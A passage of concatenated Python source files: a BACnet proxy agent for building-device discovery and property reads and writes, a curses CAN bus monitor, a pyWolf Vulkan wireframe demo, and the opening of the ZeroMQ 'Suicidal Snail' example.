def __init__(self, request, asynccall):
# requests and responses
self.ioRequest = request
self.ioResult = AsyncResult()
self.ioCall = asynccall
def set(self, value):
self.ioCall.send(None, self.ioResult.set, value)
def set_exception(self, exception):
self.ioCall.send(None, self.ioResult.set_exception, exception)
class BACnet_application(BIPSimpleApplication, RecurringTask):
def __init__(self, *args):
BIPSimpleApplication.__init__(self, *args)
RecurringTask.__init__(self, 250)
self.request_queue = Queue()
self._request = None
self.found_address=list()
# self.found_deviceidentifier=list()
# assigning invoke identifiers
self.nextInvokeID = 1
# keep track of requests to line up responses
self.iocb = {}
self.install_task()
def process_task(self):
while True:
try:
iocb = self.request_queue.get(False)
except Empty:
break
self.handle_request(iocb)
def submit_request(self, iocb):
self.request_queue.put(iocb)
def get_next_invoke_id(self, addr):
"""Called to get an unused invoke ID."""
initialID = self.nextInvokeID
while 1:
invokeID = self.nextInvokeID
self.nextInvokeID = (self.nextInvokeID + 1) % 256
# see if we've checked for them all
if initialID == self.nextInvokeID:
raise RuntimeError("no available invoke ID")
# see if this one is used
if (addr, invokeID) not in self.iocb:
break
return invokeID
def handle_request(self, iocb):
apdu = iocb.ioRequest
if isinstance(apdu, ConfirmedRequestSequence):
# assign an invoke identifier
apdu.apduInvokeID = self.get_next_invoke_id(apdu.pduDestination)
# build a key to reference the IOCB when the response comes back
invoke_key = (apdu.pduDestination, apdu.apduInvokeID)
# keep track of the request
self.iocb[invoke_key] = iocb
try:
self.request(apdu)
except StandardError as e:
iocb.set_exception(e)
def confirmation(self, apdu):
# build a key to look for the IOCB
invoke_key = (apdu.pduSource, apdu.apduInvokeID)
# find the request
iocb = self.iocb.get(invoke_key, None)
if iocb is None:
iocb.set_exception(RuntimeError("no matching request for confirmation"))
return
del self.iocb[invoke_key]
if isinstance(apdu, AbortPDU):
iocb.set_exception(RuntimeError("Device communication aborted: " + str(apdu)))
return
if isinstance(apdu, Error):
iocb.set_exception(RuntimeError("Error during device communication: " + str(apdu)))
return
elif (isinstance(iocb.ioRequest, ReadPropertyRequest) and
isinstance(apdu, ReadPropertyACK)):
# find the datatype
datatype = get_datatype(apdu.objectIdentifier[0], apdu.propertyIdentifier)
if not datatype:
iocb.set_exception(TypeError("unknown datatype"))
return
# special case for array parts, others are managed by cast_out
if issubclass(datatype, Array) and (apdu.propertyArrayIndex is not None):
if apdu.propertyArrayIndex == 0:
value = apdu.propertyValue.cast_out(Unsigned)
else:
value = apdu.propertyValue.cast_out(datatype.subtype)
else:
value = apdu.propertyValue.cast_out(datatype)
if issubclass(datatype, Enumerated):
value = datatype(value).get_long()
iocb.set(value)
elif (isinstance(iocb.ioRequest, WritePropertyRequest) and
isinstance(apdu, SimpleAckPDU)):
iocb.set(apdu)
return
elif (isinstance(iocb.ioRequest, ReadPropertyMultipleRequest) and
isinstance(apdu, ReadPropertyMultipleACK)):
result_dict = {}
for result in apdu.listOfReadAccessResults:
# here is the object identifier
objectIdentifier = result.objectIdentifier
# now come the property values per object
for element in result.listOfResults:
# get the property and array index
propertyIdentifier = element.propertyIdentifier
propertyArrayIndex = element.propertyArrayIndex
# here is the read result
readResult = element.readResult
# check for an error
if readResult.propertyAccessError is not None:
error_obj = readResult.propertyAccessError
msg = 'ERROR DURRING SCRAPE (Class: {0} Code: {1})'
print msg.format(error_obj.errorClass, error_obj.errorCode)
else:
# here is the value
propertyValue = readResult.propertyValue
# find the datatype
datatype = get_datatype(objectIdentifier[0], propertyIdentifier)
if not datatype:
iocb.set_exception(TypeError("unknown datatype"))
return
# special case for array parts, others are managed by cast_out
if issubclass(datatype, Array) and (propertyArrayIndex is not None):
if propertyArrayIndex == 0:
value = propertyValue.cast_out(Unsigned)
else:
value = propertyValue.cast_out(datatype.subtype)
else:
value = propertyValue.cast_out(datatype)
if type(value)==int:
if issubclass(datatype, Enumerated):
value = datatype(value).get_long()
if issubclass(datatype, Array):
if issubclass(datatype.subtype, Choice):
new_value = []
for item in value.value[1:]:
result = item.dict_contents().values()
if result[0] != ():
new_value.append(result[0])
else:
new_value.append(None)
value = new_value
else:
pass
#value = [x.cast_out(datatype.subtype) for x in value.value[1:]]
result_dict[objectIdentifier[0], objectIdentifier[1], propertyIdentifier] = value
iocb.set(result_dict)
else:
iocb.set_exception(TypeError('Unsupported Request Type'))
def indication(self,apdu):
self.apdu = apdu
device_type, device_instance = apdu.iAmDeviceIdentifier
self.device_type=device_type
self.device_instance=device_instance
self.release=False
self.update=True
self.updator()
def updator(self):
if self.update==True:
apdu=self.apdu
Remotestation=str(apdu.pduSource)
StationIdentifier=self.device_instance
addresslist=(Remotestation, StationIdentifier)
try:
self.found_address.append(addresslist)
#self.found_deviceidentifier.append(StationIdentifier)
except Exception as e:
print e
if self.release==True:
return (self.found_address)
def bacnet_proxy_agent(config_path, **kwargs):
config = utils.load_config(config_path)
vip_identity = config.get("vip_identity", "platform.bacnet_proxy")
#pop off the uuid based identity
ips = getIPs()
print "found local ip as ", ips
device_address = ips[0] + "/24"
kwargs.pop('identity', None)
max_apdu_len=config.get("max_apdu_length",1024)
seg_supported=config.get("segmentation_supported","segmentedBoth")
obj_id=config.get("object_id",599)
obj_name=config.get("object_name","Volttron BACnet driver")
ven_id=config.get("vendor_id",15)
return BACnetProxyAgent(device_address,
max_apdu_len, seg_supported,
obj_id, obj_name, ven_id,
heartbeat_autostart=True, identity=vip_identity,**kwargs)
class BACnetProxyAgent(Agent):
'''This agent creates a virtual bacnet device that is used by
the bacnet driver interface to communicate with devices.
'''
def __init__(self, device_address,
max_apdu_len, seg_supported,
obj_id, obj_name, ven_id,
**kwargs):
super(BACnetProxyAgent, self).__init__(**kwargs)
self.async_call = AsyncCall()
self.setup_device(device_address,
max_apdu_len, seg_supported,
obj_id, obj_name, ven_id)
def setup_device(self, address,
max_apdu_len=1024,
seg_supported='segmentedBoth',
obj_id=599,
obj_name='sMap BACnet driver',
ven_id=15):
_log.info('seg_supported '+str(seg_supported))
_log.info('max_apdu_len '+str(max_apdu_len))
_log.info('obj_id '+str(obj_id))
_log.info('obj_name '+str(obj_name))
_log.info('ven_id '+str(ven_id))
#Check to see if they gave a valid apdu length.
if encode_max_apdu_response(max_apdu_len) is None:
raise ValueError('Invalid max_apdu_len: {} Valid options are 50, 128, 206, 480, 1024, and 1476'.format(max_apdu_len))
this_device = LocalDeviceObject(
objectName=obj_name,
objectIdentifier=obj_id,
maxApduLengthAccepted=max_apdu_len,
segmentationSupported=seg_supported,
vendorIdentifier=ven_id,
)
# build a bit string that knows about the bit names and leave it empty. We respond to NOTHING.
pss = ServicesSupported()
# set the property value to be just the bits
this_device.protocolServicesSupported = pss.value
self.this_application = BACnet_application(this_device, address)
server_thread = threading.Thread(target=bacpypes.core.run)
# exit the BACnet App thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
@RPC.allow('BEMOSS_BASIC_AGENT')
@RPC.export
def broadcast(self):
try:
request = WhoIsRequest()
request.pduDestination = GlobalBroadcast()
self.this_application.request(request)
thread = threading.Thread(target=10)
self.this_application.request(request)
self.this_application.release = True
self.this_application.update = False
addresslist = self.this_application.found_address
addresslist=list(set(addresslist))
return addresslist
except Exception as e:
_log.exception("an error has occurred during bacnet discovery: %s", e)
return []
@RPC.allow('BEMOSS_BASIC_AGENT')
@RPC.export
def ping_device(self, target_address, device_id):
"""Ping a device with a whois to potentially setup routing."""
_log.debug("Pinging "+target_address)
request = WhoIsRequest()
request.deviceInstanceRangeLowLimit = device_id
request.deviceInstanceRangeHighLimit = device_id
request.pduDestination = GlobalBroadcast()
iocb = IOCB(request, self.async_call)
self.this_application.submit_request(iocb)
@RPC.allow('BEMOSS_BASIC_AGENT')
@RPC.export
def write_property(self, target_address, value, object_type, instance_number, property_name, priority=None, index=None):
"""Write to a property."""
request = WritePropertyRequest(
objectIdentifier=(object_type, instance_number),
propertyIdentifier=property_name)
datatype = get_datatype(object_type, property_name)
if (value is None or value == 'null'):
bac_value = Null()
elif issubclass(datatype, Atomic):
if datatype is Integer:
value = int(value)
elif datatype is Real:
value = float(value)
elif datatype is Unsigned:
value = int(value)
bac_value = datatype(value)
elif issubclass(datatype, Array) and (index is not None):
if index == 0:
bac_value = Integer(value)
elif issubclass(datatype.subtype, Atomic):
bac_value = datatype.subtype(value)
elif not isinstance(value, datatype.subtype):
raise TypeError("invalid result datatype, expecting %s" % (datatype.subtype.__name__,))
elif not isinstance(value, datatype):
raise TypeError("invalid result datatype, expecting %s" % (datatype.__name__,))
request.propertyValue = Any()
request.propertyValue.cast_in(bac_value)
request.pduDestination = Address(target_address)
#Optional index
if index is not None:
request.propertyArrayIndex = index
#Optional priority
if priority is not None:
request.priority = priority
iocb = IOCB(request, self.async_call)
self.this_application.submit_request(iocb)
result = iocb.ioResult.wait()
if isinstance(result, SimpleAckPDU):
return value
raise RuntimeError("Failed to set value: " + str(result))
@RPC.allow('BEMOSS_BASIC_AGENT')
@RPC.export
def simple_read(self, target_address, obj_inst, propertylist, obj_type= "device", index=0):
try:
reverse_point_map = {}
result_dict = []
read_access_spec_list = []
count = 0
prop_ref_list = []
for prop in propertylist:
prop_ref = PropertyReference(propertyIdentifier=prop)
prop_ref_list.append(prop_ref)
count += 1
read_access_spec = ReadAccessSpecification(objectIdentifier=(obj_type, obj_inst),
listOfPropertyReferences=prop_ref_list)
read_access_spec_list.append(read_access_spec)
if read_access_spec_list:
if count==1:
_log.debug("Requesting {property} properties from {target}".format(property=prop,
target=target_address))
else:
_log.debug("Requesting {count} properties from {target}".format(count=count,
target=target_address))
request = ReadPropertyMultipleRequest(listOfReadAccessSpecs=read_access_spec_list)
request.pduDestination = Address(target_address)
iocb = IOCB(request, self.async_call)
self.this_application.submit_request(iocb)
print "bacnet request sent"
bacnet_results=tuple
bacnet_results = iocb.ioResult.get(35)
print"bacnet data fetched"
for prop_tuple, value in bacnet_results.iteritems():
result_dict.append(value)
print result_dict
return result_dict
except Exception as e:
print e
return None
@RPC.allow('BEMOSS_BASIC_AGENT')
@RPC.export
def read_properties(self, target_address, point_map, max_per_request=None):
"""Read a set of points and return the results"""
#Set max_per_request really high if not set.
if max_per_request is None:
max_per_request = 1000000
_log.debug("Reading {count} points on {target}, max per scrape: {max}".format(count=len(point_map),
target=target_address,
max=max_per_request))
#This will be used to get the results mapped
# back on the the names
reverse_point_map = {}
#TODO Support rading an index of an Array.
#Used to group properties together for the request.
object_property_map = defaultdict(list)
for name, properties in point_map.iteritems():
object_type, instance_number, property_name = properties
reverse_point_map[object_type,
instance_number,
property_name] = name
object_property_map[object_type,
instance_number].append(property_name)
result_dict={}
finished = False
while not finished:
read_access_spec_list = []
count = 0
for _ in xrange(max_per_request):
try:
obj_data, properties = object_property_map.popitem()
except KeyError:
finished = True
break
obj_type, obj_inst = obj_data
prop_ref_list = []
for prop in properties:
prop_ref = PropertyReference(propertyIdentifier=prop)
prop_ref_list.append(prop_ref)
count += 1
read_access_spec = ReadAccessSpecification(objectIdentifier=(obj_type, obj_inst),
listOfPropertyReferences=prop_ref_list)
read_access_spec_list.append(read_access_spec)
if read_access_spec_list:
_log.debug("Requesting {count} properties from {target}".format(count=count,
target=target_address))
request = ReadPropertyMultipleRequest(listOfReadAccessSpecs=read_access_spec_list)
request.pduDestination = Address(target_address)
iocb = IOCB(request, self.async_call)
self.this_application.submit_request(iocb)
bacnet_results = iocb.ioResult.get(10)
_log.debug("Received read response from {target}".format(count=count,
target=target_address))
for prop_tuple, value in bacnet_results.iteritems():
name = reverse_point_map[prop_tuple]
result_dict[name] = value
return result_dict
def main(argv=sys.argv):
'''Main method called to start the agent.'''
utils.vip_main(bacnet_proxy_agent)
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
|
canmonitor.py
|
#!/usr/bin/env python3
import argparse
import curses
import sys
import threading
import traceback
from .source_handler import CandumpHandler, InvalidFrame, SerialHandler
should_redraw = threading.Event()
stop_reading = threading.Event()
can_messages = {}
can_messages_lock = threading.Lock()
thread_exception = None
def reading_loop(source_handler, blacklist):
"""Background thread for reading."""
try:
while not stop_reading.is_set():
try:
frame_id, data = source_handler.get_message()
except InvalidFrame:
continue
except EOFError:
break
if frame_id in blacklist:
continue
# Add the frame to the can_messages dict and tell the main thread to refresh its content
with can_messages_lock:
can_messages[frame_id] = data
should_redraw.set()
stop_reading.wait()
except:
if not stop_reading.is_set():
# Only log exception if we were not going to stop the thread
# When quitting, the main thread calls close() on the serial device
# and read() may throw an exception. We don't want to display it as
# we're stopping the script anyway
global thread_exception
thread_exception = sys.exc_info()
def init_window(stdscr):
"""Init a window filling the entire screen with a border around it."""
stdscr.clear()
stdscr.refresh()
max_y, max_x = stdscr.getmaxyx()
root_window = stdscr.derwin(max_y, max_x, 0, 0)
root_window.box()
return root_window
def format_data_hex(data):
"""Convert the bytes array to an hex representation."""
# Bytes are separated by spaces.
return ' '.join('%02X' % byte for byte in data)
def format_data_ascii(data):
"""Try to make an ASCII representation of the bytes.
Non printable characters are replaced by '?' except null character which
is replaced by '.'.
"""
msg_str = ''
for byte in data:
char = chr(byte)
if char == '\0':
msg_str = msg_str + '.'
elif ord(char) < 32 or ord(char) > 126:
msg_str = msg_str + '?'
else:
msg_str = msg_str + char
return msg_str
def main(stdscr, reading_thread):
"""Main function displaying the UI."""
# Don't print typed character
curses.noecho()
curses.cbreak()
curses.curs_set(0) # set cursor state to invisible
# Set getch() to non-blocking
stdscr.nodelay(True)
win = init_window(stdscr)
while True:
# should_redraw is set by the serial thread when new data is available
if should_redraw.wait(timeout=0.05): # Timeout needed in order to react to user input
max_y, max_x = win.getmaxyx()
column_width = 50
id_column_start = 2
bytes_column_start = 13
text_column_start = 38
# Compute row/column counts according to the window size and borders
row_start = 3
lines_per_column = max_y - (1 + row_start)
num_columns = (max_x - 2) // column_width
# Setting up column headers
for i in range(0, num_columns):
win.addstr(1, id_column_start + i * column_width, 'ID')
win.addstr(1, bytes_column_start + i * column_width, 'Bytes')
win.addstr(1, text_column_start + i * column_width, 'Text')
win.addstr(3, id_column_start, "Beta By Justin Greer - Press 'q' to quit")
row = row_start + 2 # The first column starts a bit lower to make space for the 'press q to quit message'
current_column = 0
# Make sure we don't read the can_messages dict while it's being written to in the reading thread
with can_messages_lock:
for frame_id in sorted(can_messages.keys()):
msg = can_messages[frame_id]
msg_bytes = format_data_hex(msg)
msg_str = format_data_ascii(msg)
# print frame ID in decimal and hex
win.addstr(row, id_column_start + current_column * column_width, '%s' % str(frame_id).ljust(5))
#win.addstr(row, id_column_start + 5 + current_column * column_width, '%X'.ljust(5) % frame_id)
# print frame bytes
win.addstr(row, bytes_column_start + current_column * column_width, msg_bytes.ljust(23))
# print frame text
win.addstr(row, text_column_start + current_column * column_width, msg_str.ljust(8))
row = row + 1
if row >= lines_per_column + row_start:
# column full, switch to the next one
row = row_start
current_column = current_column + 1
if current_column >= num_columns:
break
win.refresh()
should_redraw.clear()
c = stdscr.getch()
if c == ord('q') or not reading_thread.is_alive():
break
elif c == curses.KEY_RESIZE:
win = init_window(stdscr)
should_redraw.set()
def parse_ints(string_list):
int_set = set()
for line in string_list:
try:
int_set.add(int(line, 0))
except ValueError:
continue
return int_set
def run():
parser = argparse.ArgumentParser(description='Process CAN data from a serial device or from a file.')
parser.add_argument('serial_device', type=str, nargs='?')
parser.add_argument('baud_rate', type=int, default=115200, nargs='?',
help='Serial baud rate in bps (default: 115200)')
parser.add_argument('-f', '--candump-file', metavar='CANDUMP_FILE', help="File (of 'candump' format) to read from")
parser.add_argument('-s', '--candump-speed', type=float, metavar='CANDUMP_SPEED', help="Speed scale of file read")
parser.add_argument('--blacklist', '-b', nargs='+', metavar='BLACKLIST', help="Ids that must be ignored")
parser.add_argument(
'--blacklist-file',
'-bf',
metavar='BLACKLIST_FILE',
help="File containing ids that must be ignored",
)
args = parser.parse_args()
# checks arguments
if not args.serial_device and not args.candump_file:
print("Please specify serial device or file name")
print()
parser.print_help()
return
if args.serial_device and args.candump_file:
print("You cannot specify a serial device AND a file name")
print()
parser.print_help()
return
# --blacklist-file prevails over --blacklist
if args.blacklist_file:
with open(args.blacklist_file) as f_obj:
blacklist = parse_ints(f_obj)
elif args.blacklist:
blacklist = parse_ints(args.blacklist)
else:
blacklist = set()
if args.serial_device:
source_handler = SerialHandler(args.serial_device, baudrate=args.baud_rate)
elif args.candump_file:
source_handler = CandumpHandler(args.candump_file, args.candump_speed)
reading_thread = None
try:
# If reading from a serial device, it will be opened with timeout=0 (non-blocking read())
source_handler.open()
# Start the reading background thread
reading_thread = threading.Thread(target=reading_loop, args=(source_handler, blacklist,))
reading_thread.start()
# Make sure to draw the UI the first time even if no data has been read
should_redraw.set()
# Start the main loop
curses.wrapper(main, reading_thread)
finally:
# Cleanly stop reading thread before exiting
if reading_thread:
stop_reading.set()
if source_handler:
source_handler.close()
reading_thread.join()
# If the thread returned an exception, print it
if thread_exception:
traceback.print_exception(*thread_exception)
sys.stderr.flush()
if __name__ == '__main__':
run()
|
20_tessellation.py
|
import sys, os
#get path of script
_script_path = os.path.realpath(__file__)
_script_dir = os.path.dirname(_script_path)
pyWolfPath = _script_dir
if sys.platform == "linux" or sys.platform == "linux2":
print "Linux not tested yet"
elif sys.platform == "darwin":
print "OS X not tested yet"
elif sys.platform == "win32":
pyWolfPath = pyWolfPath + "\\..\\..\\..\\..\\bin\\x64\\Debug\\Win32\\"
if pyWolfPath != "" and (not pyWolfPath in sys.path):
sys.path.append(pyWolfPath)
import ctypes, threading, pyWolf
from math import cos
from PySide import QtGui, QtCore
from PySide.QtGui import *
from PySide.QtCore import *
screen_width = 800
screen_height = 600
class gui(QWidget):
def __init__(self, parent=None):
super(gui, self).__init__(parent)
self.debug_text = ""
self._label = QLabel()
self._label.setAlignment(Qt.AlignLeft)
vbox = QVBoxLayout()
vbox.addWidget(self._label)
self.setLayout(vbox)
timer = QTimer(self)
timer.timeout.connect(self.updateTime)
timer.start(30)
def updateTime(self):
self._label.setText(self.debug_text)
class scene(QWidget):
def __init__(self, pContentPath, pLogPath, pAppName, parent = None):
super(scene, self).__init__(parent)
self.__exiting = False
self._game = pyWolf.framework.w_game(pContentPath, pLogPath, pAppName)
self._game.set_pre_init_callback(self.pre_init)
self._game.set_post_init_callback(self.post_init)
self._game.set_load_callback(self.load)
self._game.set_update_callback(self.update)
self._game.set_pre_render_callback(self.pre_render)
self._game.set_post_render_callback(self.post_render)
self._gDevice = None
self._viewport = pyWolf.graphics.w_viewport()
self._viewport_scissor = pyWolf.graphics.w_viewport_scissor()
self._draw_command_buffers = pyWolf.graphics.w_command_buffers()
self._draw_render_pass = pyWolf.graphics.w_render_pass()
self._draw_fence = pyWolf.graphics.w_fences()
self._draw_semaphore = pyWolf.graphics.w_semaphore()
self._shader = pyWolf.graphics.w_shader()
self._mesh = pyWolf.graphics.w_mesh()
self._texture = pyWolf.graphics.w_texture()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._show_wireframe = True
self._rebuild_command_buffer = True
self._solid_pipeline = pyWolf.graphics.w_pipeline()
self._wireframe_pipeline = pyWolf.graphics.w_pipeline()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_config = pyWolf.graphics.w_graphics_device_manager_configs()
_config.debug_gpu = False
self._game.set_graphics_device_manager_configs(_config)
def pre_init(self):
print "pre_init"
def post_init(self):
#get main graphics device
self._gDevice = self._game.get_graphics_device(0)
print self._gDevice.get_info()
print "post_init"
def load(self):
#initialize viewport
self._viewport.y = 0
self._viewport.width = screen_width
self._viewport.height = screen_height
self._viewport.minDepth = 0
self._viewport.maxDepth = 1
#initialize scissor of viewport
self._viewport_scissor.offset.x = 0
self._viewport_scissor.offset.y = 0
self._viewport_scissor.extent.width = screen_width
self._viewport_scissor.extent.height = screen_height
#load render pass which contains frame buffers
_render_pass_attachments = []
_output_window = self._gDevice.output_presentation_window
for _iter in _output_window.swap_chain_image_views:
# COLOR #DEPTH
_render_pass_attachments.append([_iter, _output_window.depth_buffer_image_view])
_hr = self._draw_render_pass.load(self._gDevice, self._viewport, self._viewport_scissor, _render_pass_attachments)
if _hr:
print "Error on loading render pass"
self.release()
sys.exit(1)
#create one semaphore for drawing
_hr = self._draw_semaphore.initialize(self._gDevice)
if _hr:
print "Error on initializing semaphore"
self.release()
sys.exit(1)
#create one fence for drawing
_hr = self._draw_fence.initialize(self._gDevice, 1)
if _hr:
print "Error on initializing fence(s)"
self.release()
sys.exit(1)
#create one fence for drawing
number_of_swap_chains = self._gDevice.get_number_of_swap_chains()
_hr = self._draw_command_buffers.load(self._gDevice, number_of_swap_chains, pyWolf.graphics.w_command_buffer_level.PRIMARY)
if _hr:
print "Error on initializing draw command buffer(s)"
self.release()
sys.exit(1)
#loading vertex shader
_content_path_dir = _script_dir + "/content/"
_hr = self._shader.load(self._gDevice, _content_path_dir + "shaders/shader.vert.spv", pyWolf.graphics.w_shader_stage_flag_bits.VERTEX_SHADER)
if _hr:
print "Error on loading vertex shader"
self.release()
sys.exit(1)
#loading fragment shader
_hr = self._shader.load(self._gDevice, _content_path_dir + "shaders/shader.frag.spv", pyWolf.graphics.w_shader_stage_flag_bits.FRAGMENT_SHADER)
if _hr:
print "Error on loading fragment shader"
self.release()
sys.exit(1)
_hr = self._texture.initialize(self._gDevice, 8, 8, False, False)
if _hr:
print "Error on initializing texture"
self.release()
sys.exit(1)
self._texture.set_view_type(pyWolf.graphics.w_image_view_type._2D_ARRAY)
#load texture from file
_hr = self._texture.load_texture_2D_from_file(_content_path_dir + "../../../../../Logo.jpg", True)
if _hr:
print "Error on loading " + _content_path_dir + "../../../../../Logo.jpg"
self.release()
sys.exit(1)
#just we need vertex position color
_vba = pyWolf.graphics.w_vertex_binding_attributes(pyWolf.graphics.w_vertex_declaration.VERTEX_POSITION_UV)
self._mesh.set_vertex_binding_attributes(_vba)
_shader_param_0 = pyWolf.graphics.w_shader_binding_param()
_shader_param_0.index = 0
_shader_param_0.type = pyWolf.graphics.w_shader_binding_type.SAMPLER2D
_shader_param_0.stage = pyWolf.graphics.w_shader_stage_flag_bits.FRAGMENT_SHADER
_shader_param_0.image_info = self._texture.get_descriptor_info()
_hr = self._shader.set_shader_binding_params( [_shader_param_0 ])
if _hr:
print "Set shader binding params"
#loading pipeline cache
_pipeline_cache_name = "pipeline_cache"
_hr = self._solid_pipeline.create_pipeline_cache(self._gDevice, _pipeline_cache_name)
if _hr:
print "Error on creating pipeline cache"
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_rasterization_states = pyWolf.graphics.w_graphics_device.defaults_states.pipelines.rasterization_create_info
_rasterization_states.polygon_mode = pyWolf.graphics.w_polygon_mode.LINE
_multisample_states = pyWolf.graphics.w_graphics_device.defaults_states.pipelines.multisample_create_info
_blend_states = pyWolf.graphics.w_graphics_device.defaults_states.blend_states.premulitplied_alpha
_blend_color = pyWolf.system.w_color.TRANSPARENT_()
#create pipeline
_hr = self._wireframe_pipeline.load(self._gDevice, _vba, pyWolf.graphics.w_primitive_topology.TRIANGLE_LIST, self._draw_render_pass, self._shader, [self._viewport], [ self._viewport_scissor ], _pipeline_cache_name, [], [], 0, _rasterization_states, _multisample_states, _blend_states, _blend_color)
if _hr:
print "Error on creating pipeline"
self.release()
sys.exit(1)
#create pipeline
_rasterization_states.polygon_mode = pyWolf.graphics.w_polygon_mode.FILL
_hr = self._solid_pipeline.load(self._gDevice, _vba, pyWolf.graphics.w_primitive_topology.TRIANGLE_LIST, self._draw_render_pass, self._shader, [self._viewport], [ self._viewport_scissor ], _pipeline_cache_name, [], [], 0, _rasterization_states, _multisample_states, _blend_states, _blend_color)
if _hr:
print "Error on creating pipeline"
self.release()
sys.exit(1)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_vertex_data = [
-0.7, -0.7, 0.0, #pos0
0.0, 0.0, #uv0
-0.7, 0.7, 0.0, #pos1
0.0, 1.0, #uv1
0.7, 0.7, 0.0, #pos2
1.0, 1.0, #uv2
0.7, -0.7, 0.0, #pos3
1.0, 0.0, #uv3
]
_index_data = [ 0,1,3,3,1,2 ]
#create mesh
self._mesh.set_texture(self._texture)
_hr = self._mesh.load(self._gDevice, _vertex_data, _index_data, False)
if _hr:
print "Error on loading mesh"
self.release()
sys.exit(1)
print "scene loaded successfully"
def build_command_buffers(self):
_hr = pyWolf.W_PASSED
_size = self._draw_command_buffers.get_commands_size()
for i in xrange(_size):
_cmd = self._draw_command_buffers.get_command_at(i)
_hr = self._draw_command_buffers.begin(i)
if _hr:
print "Error on begining command buffer: " + str(i)
break
self._draw_render_pass.begin(i, _cmd, pyWolf.system.w_color.CORNFLOWER_BLUE(), 1.0, 0)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
if self._show_wireframe:
self._wireframe_pipeline.bind(_cmd)
else:
self._solid_pipeline.bind(_cmd)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._mesh.draw(_cmd, None, 0, False)
self._draw_render_pass.end(_cmd)
_hr = self._draw_command_buffers.end(i)
if _hr:
print "Error on ending command buffer: " + str(i)
break
return _hr
def update(self, pGameTime):
#Update label of gui widget
global _gui
_gui.debug_text = "FPS: " + str(pGameTime.get_frames_per_second()) + "\r\n\r\nFrameTime: " + str(pGameTime.get_elapsed_seconds()) + "\r\n\r\nTotalTime: " + str(pGameTime.get_total_seconds())
if self._rebuild_command_buffer:
self._rebuild_command_buffer = False
_hr = self.build_command_buffers()
if _hr:
print "Error on building draw command buffer(s)"
self.release()
sys.exit(1)
def pre_render(self, pGameTime):
_output_window = self._gDevice.output_presentation_window
_frame_index = _output_window.swap_chain_image_index
_wait_dst_stage_mask = [ pyWolf.graphics.w_pipeline_stage_flag_bits.COLOR_ATTACHMENT_OUTPUT_BIT ]
_wait_semaphores = [ _output_window.swap_chain_image_is_available_semaphore ]
_signal_semaphores = [ _output_window.rendering_done_semaphore ]
_cmd = self._draw_command_buffers.get_command_at(_frame_index)
_cmd_buffers = [_cmd]
#reset draw fence
self._draw_fence.reset()
_hr = self._gDevice.submit(_cmd_buffers, self._gDevice.graphics_queue, _wait_dst_stage_mask, _wait_semaphores, _signal_semaphores, self._draw_fence)
if _hr:
print "Error on submit to graphics device"
return
_hr = self._draw_fence.wait()
if _hr:
print "Error on waiting for draw fence"
return
def post_render(self, pSuccessfullyRendered):
if pSuccessfullyRendered == False:
print "Rendered Unsuccessfully"
def run(self):
#run game
_window_info = pyWolf.system.w_window_info()
_window_info.width = self.width()
_window_info.height = self.height()
_window_info.v_sync_enable = False
_window_info.is_full_screen = False
_window_info.swap_chain_format = 44 # BGRA8Unorm in VULKAN
_window_info.cpu_access_swap_chain_buffer = False
# get window handle
pycobject_hwnd = self.winId()
#convert window handle as HWND to unsigned integer pointer for c++
ctypes.pythonapi.PyCObject_AsVoidPtr.restype = ctypes.c_void_p
ctypes.pythonapi.PyCObject_AsVoidPtr.argtypes = [ctypes.py_object]
int_hwnd = ctypes.pythonapi.PyCObject_AsVoidPtr(pycobject_hwnd)
_window_info.set_win_id(int_hwnd)
#initialize game
_map_info = (0, _window_info)
while True:
if self.__exiting:
self.release()
break
self._game.run(_map_info)
print "Game exited"
def showEvent(self, event):
#run in another thread
threading.Thread(target=self.run).start()
event.accept()
def closeEvent(self, event):
self.__exiting = True
event.accept()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
def keyPressEvent(self, event):
_key = event.key()
if _key == QtCore.Qt.Key.Key_Escape:
self.__exiting = True
elif _key == QtCore.Qt.Key.Key_W:
self._show_wireframe = not self._show_wireframe
self._rebuild_command_buffer = True
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
def release(self):
self._draw_fence.release()
self._draw_fence = None
self._draw_semaphore.release()
self._draw_semaphore = None
self._draw_command_buffers.release()
self._draw_command_buffers = None
self._draw_render_pass.release()
self._draw_render_pass = None
self._shader.release()
self._shader = None
self._wireframe_pipeline.release()
self._wireframe_pipeline = None
self._solid_pipeline.release()
self._solid_pipeline = None
self._mesh.release()
self._mesh = None
self._texture.release()
self._texture = None
self._game.release()
self._game = None
self._gDevice = None
self._viewport = None
self._viewport_scissor = None
if __name__ == '__main__':
# Create a Qt application
_app = QApplication(sys.argv)
#Init gui
_gui = gui()
_gui.resize(screen_width /2, screen_height /2)
_gui.setWindowTitle('Wolf.Engine Debug')
#Init scene
_scene = scene(pyWolfPath + "..\\..\\..\\..\\content\\",
pyWolfPath,
"py_11_pipeline")
_scene.resize(screen_width, screen_height)
_scene.setWindowTitle('Wolf.Engine')
#Show all widgets
_scene.show()
_gui.show()
sys.exit(_app.exec_())
|
suisnail.py
|
"""
Suicidal Snail
Author: Min RK <benjaminrk@gmail.com>
"""
from __future__ import print_function
import sys
import threading
import time
from pickle import dumps, loads
import random
import zmq
from zhelpers import zpipe
# ---------------------------------------------------------------------
# This is our subscriber
# It connects to the publisher and subscribes to everything. It
# sleeps for a short time between messages to simulate doing too
# much work. If a message is more than 1 second late, it croaks.
MAX_ALLOWED_DELAY = 1.0 # secs
def subscriber(pipe):
# Subscribe to everything
ctx = zmq.Context.instance()
sub = ctx.socket(zmq.SUB)
sub.setsockopt(zmq.SUBSCRIBE, b'')
sub.connect("tcp://localhost:5556")
# Get and process messages
while True:
clock = loads(sub.recv())
# Suicide snail logic
